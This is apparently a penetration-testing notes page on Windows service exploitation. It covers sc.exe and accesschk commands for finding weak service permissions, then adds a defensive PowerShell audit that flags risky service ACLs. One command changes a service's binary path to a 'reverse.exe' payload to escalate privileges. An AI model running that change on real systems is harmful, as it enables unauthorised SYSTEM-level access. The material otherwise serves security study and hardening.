# Service Exploitation

### Basic Commands

```powershell
# Query the configuration of a service
sc.exe qc $service_name

# Query the current status of a service
sc.exe query $service_name

# Modify an option on a service
sc.exe config $service_name $option= $value

# Start and stop a service
net start $service_name
net stop $service_name
```

### Accesschk.exe

#### Use [Accesschk.exe](https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk) to validate service permissions:

```powershell
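# -c: the name is a service, -w: only write-level access, -v: verbose, -u/-q: suppress errors and banner
.\accesschk.exe /accepteula -uwcqv user $service_name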
```

* In the output, look for the `SERVICE_START` and `SERVICE_STOP` permissions.
* Also confirm that the service runs under an account with higher privileges (e.g., `LocalSystem`).

### Notes

* Validate whether you can start/stop the service or restart the machine. If you cannot, you may not be able to use the service to escalate your privileges.
* Use `whoami /priv` to check whether we can reboot the system.
* An easy way to escalate privileges through a service is to modify its binary path. The following is an example:

```powershell
# Use sc.exe explicitly: in Windows PowerShell, "sc" is an alias for Set-Content
sc.exe config $service_name binpath= "C:\Windows\Tasks\reverse.exe"
```
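
For the hardening side of the checks above, this added example (not part of the original page) decodes a service security descriptor in the SDDL form printed by `sc.exe sdshow` and flags allow-ACEs that give low-privileged groups the right to change the service configuration, which is the right a binary-path change depends on. The function name `Get-WeakServiceAce`, the service names and the SDDL strings are constructed for illustration, and it assumes two-letter rights codes and well-known trustee aliases (hex masks and raw SIDs are not decoded).

```powershell
# Added audit example; sample service names and SDDL strings are constructed.
# Service-specific meaning of the two-letter SDDL rights codes.
$ServiceRights = @{
    CC = 'SERVICE_QUERY_CONFIG';   DC = 'SERVICE_CHANGE_CONFIG'
    LC = 'SERVICE_QUERY_STATUS';   SW = 'SERVICE_ENUMERATE_DEPENDENTS'
    RP = 'SERVICE_START';          WP = 'SERVICE_STOP'
    DT = 'SERVICE_PAUSE_CONTINUE'; LO = 'SERVICE_INTERROGATE'
    CR = 'SERVICE_USER_DEFINED_CONTROL'
    SD = 'DELETE'; RC = 'READ_CONTROL'; WD = 'WRITE_DAC'; WO = 'WRITE_OWNER'
    GA = 'GENERIC_ALL'; GW = 'GENERIC_WRITE'   # both include SERVICE_CHANGE_CONFIG
}
# Rights that let the holder change what the service runs, or grant themselves that right.
$Dangerous = 'SERVICE_CHANGE_CONFIG', 'WRITE_DAC', 'WRITE_OWNER', 'GENERIC_ALL', 'GENERIC_WRITE'
# Well-known low-privileged trustees, keyed by SDDL alias.
$LowPriv = @{ WD = 'Everyone'; AU = 'Authenticated Users'; BU = 'BUILTIN\Users'; IU = 'INTERACTIVE' }

function Get-WeakServiceAce {
    param([string]$ServiceName, [string]$Sddl)
    foreach ($m in [regex]::Matches($Sddl, '\(([^)]*)\)')) {
        # ACE fields: type;flags;rights;object_guid;inherit_guid;trustee
        $f = $m.Groups[1].Value -split ';'
        # Only allow-ACEs ('A') for low-privileged trustees are of interest;
        # SACL audit ACEs have other type codes and are skipped here.
        if ($f.Count -lt 6 -or $f[0] -ne 'A' -or -not $LowPriv.ContainsKey($f[5])) { continue }
        $codes = @([regex]::Matches($f[2], '[A-Z]{2}') | ForEach-Object { $_.Value })
        $names = @($codes | ForEach-Object { $ServiceRights[$_] } | Where-Object { $_ })
        $risky = @($names | Where-Object { $Dangerous -contains $_ })
        if ($risky.Count -gt 0) {
            [pscustomobject]@{
                Service      = $ServiceName
                Trustee      = $LowPriv[$f[5]]
                RiskyRights  = $risky -join ','
                # Start and stop rights make a configuration change take effect immediately.
                CanStartStop = ($codes -contains 'RP') -and ($codes -contains 'WP')
            }
        }
    }
}

# Constructed sample input in the format printed by `sc.exe sdshow <name>`.
$Samples = @{
    SampleHardenedSvc = 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)'
    SampleWeakSvc     = 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPLOCRRC;;;AU)'
}
$Samples.GetEnumerator() |
    ForEach-Object { Get-WeakServiceAce -ServiceName $_.Key -Sddl $_.Value } |
    Format-Table -AutoSize
```

On a live host, pass the joined output of `sc.exe sdshow $service_name` as `-Sddl`. Any service the function reports should have the low-privileged ACE reduced to query, start and stop rights at most.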
